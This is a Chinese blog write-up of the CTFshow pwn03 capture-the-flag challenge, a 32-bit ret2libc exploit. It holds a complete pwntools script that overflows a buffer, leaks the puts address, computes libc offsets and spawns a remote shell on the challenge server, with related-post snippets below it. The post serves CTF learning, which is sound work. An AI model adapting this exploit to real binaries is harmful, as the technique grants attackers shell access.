CTFshow pwn03(ret2libc-32bit

已于 2022-12-03 14:33:24 修改
阅读量730 收藏 2
点赞数
分类专栏: CTF 文章标签: python pwn
于 2022-11-30 08:54:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mintind/article/details/128108592
版权

CTFshow-pwn03

ret2lib,代码中没有system也没有/bin/sh,都要在动态库里找
payload1得到puts真实地址

上lib database search利用puts_addr查找库

from pwn import *  
#from LibcSearcher import *

context.log_level = 'debug'  
elf = ELF('./stack1')  
#p = process('./stack1')  
p = remote("pwn.challenge.ctf.show", 28106)  
  
puts_plt = elf.plt['puts']  
puts_got = elf.got['puts']  
main_addr = elf.symbols['main']  
payload = b'a' * 13 + p32(puts_plt) + p32(main_addr) + p32(puts_got)  
p.sendline(payload)  
p.recvuntil('\n\n')//接收两个换行(?)  
puts_addr = u32(p.recv(4))//接受4位  
print(hex(puts_addr))//获得了puts地址,上lib databse search查,输入puts和后三位得到是哪个库  
 
libcbase = puts_addr - 0x067360//库基地址=puts地址-puts在库中的偏移  
system_addr = libcbase + 0x03cd10  
binsh_addr = libcbase + 0x17b8cf//可以找到str_bin_sh的偏移  
payload = b'a' * 13 + p32(system_addr) + b'a'*4 + p32(binsh_addr)//中间4位的是system返回地址,因为不需要做什么可以随便填  
p.sendline(payload)  
p.interactive()

上网查库的部分可以改用LibSearcher库实现 (虽然我的总说找不到库

lib = LibcSearcher("puts", puts_addr)
libcbase = puts_addr - lib.dump("puts")
system_addr = libcbase + lib.dump("system")
binsh_addr = libcbase + lib.dump("str_bin_sh")

看这张图感觉悟了一点…

来自ctfshow-pwn03[recorded]
用cyclic算偏移用的是eip的地址(可以gdb下溢出的时候从错误信息看到
在这里插入图片描述

Mintind
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow pwn3
qq_39980610的博客
08-19 518
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
ctfshow pwn03
王富贵同学的博客
01-18 1231
ctfshow pwn03 知识点: 全局偏移表(GOT:Global Offset Table)存放外部的函数地址 程序链接表(PLT:Procedure Link Table)存放额外代码 延迟绑定:只有动态库函数在被调用时,才会地址解析和重定位工作 plt表和got表 程序还未执行时,got表里还是plt表的地址 程序执行后,plt表里是got表的地址,got表是函数的真实地址 截图出处 main()函数 pwnme() s只开辟了9个字节,而fgets函数读入了100(0x64)个字节 存在栈
CTFSHOW-PWN入门-Test_your_nc
最新发布
2402_84133101的博客
04-13 369
根据第12行代码得知,变量s1的值为CTFshowPWN,第15行代码输入变量s2的值,比较s1和s2的值,相等就执行execve_func函数。系统提示3秒后关闭,但是实际上不会,cd到根目录,在根目录上发现了flag。根据系统提示,使用输入cat /ctfshow_flag即可看到flag。system为后门函数,也看到了cat /ctfshow_flag。这题nc连接上之后没有什么发现,下载附件,使用IDA查看一番。输入CTFshowPWN,即可拿到shell,找到flag。
ctfshow_pwn03
Dem1的博客
05-19 3543
https://www.bilibili.com/video/av885494681 #查看libc地址 lbb 文件名
CTFshow pwn03
m0_72827793的博客
05-15 700
题目:在做本道题前,我们先了解所必要的知识。
ctfshow pwn 03 全细节题解
A2247328295的博客
04-12 419
代码部分自己在写的时候也遇见了很多问题,我会给出解释,单句解释看图片,前半段的作用是通过泄露的puts函数获取该函数的真实地址给get_addr,然后去https://libc.blukat.me/查询libc版本获取后面函数的真实地址,后半部分就是常规的栈溢出,payload部分4个a占4个字节,同上为32位的程序,通常4个字节可以覆盖到返回地址部分。9个字节长的数组,但接受了100个字节的长度存在栈溢出,其实这里我们已经可推算出偏移为13了,32位的程序,通常情况加4个字节覆盖到返回地址。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
pwn03
2301_80477504的博客
02-07 1279
例行checksec(32位,打开了nx保护)ida中进行分析main函数f5查看伪代码,gets为溢出点,v4溢出,用来溢出覆盖返回地址查看字符串(发现了flag.txt)查看所在函数(发现当a1 == 814536271 && a2 == 425138641时,即可得到flag)查看a1和a2在栈上的参数位置,它的位置在返回地址之后,没法利用溢出覆盖来控制程序。
ctfshow_pwn03 stack1
yw__y的博客
07-25 177
长亭PWN笔记03
kelxLZ的博客
12-28 389
什么是堆 glibc的堆管理实现 arena bins chunk malloc和free的工作流程 fastbin attack 新版本glibc中的tcache 堆的花式玩法 什么是堆 栈通常用于为函数分配固定大小的局部内存 堆是可以根据运行时的需要进行动态分配和释放的内存,大小可变 Malloc/New Free/Delete 堆的实现重点关注内存块的组织和管理方式,尤其是空闲内存块 如何提高分配和释放效率 如何降低碎片化,提高空间利用率 举例:浏览器的DOM树通常分配在堆上.
pwn3第三关
qq_18823653的博客
03-30 235
溢出点,保护都和上一关一样,这一关有外部函数system()和字符串/bin/sh, exp如下: from pwn import * elf=ELF('./pwn3') p=process('./pwn3') payload='a'*112+p32(elf.plt['system'])+p32(0x11111111)+p32(0x08048720) #0x111111是返回地址,0x080487...
CTFShow pwn07 (ret2libc-64bit
Mintind的博客
12-03 1097
CTFShow pwn07解题记录
ctf wiki ret2lib3
weixin_55885866的博客
05-16 102
由于直接发送会导致,接下来接收的字符串并不是我们所需要的字符串。可能接收到printf函数输出的字符串。关于为什么会使用sendline而不是send 由于gets 函数遇到\n停止读取。注:不能直接用elf 去查看函数位置,因为查询的是plt处的func地址。通过泄露gots表中的数据去判断动态库的基地址。关于为什么第一次使用sendlineafter。
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1058
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
CTFSHOW PWN02
m0_74093152的博客
03-22 870
CTFSHOWPWN02
ctfshow pwn
08-07
你想了解关于 CTFShow Pwn 的信息吗?CTFShow 是一个国内知名的CTF比赛平台,Pwn 则是其中的一个攻防领域,主要涉及利用漏洞进行系统攻击和控制的技术。在 CTFShow Pwn 中,参赛选手需要通过分析二进制程序的漏洞,利用它们来获取系统控制权,并完成指定的任务。这个领域需要对二进制程序分析、漏洞挖掘、堆栈溢出、ROP链构造等技术有一定的了解和实践经验。如果你对具体的题目或技术有更具体的问题,我可以帮你进一步解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值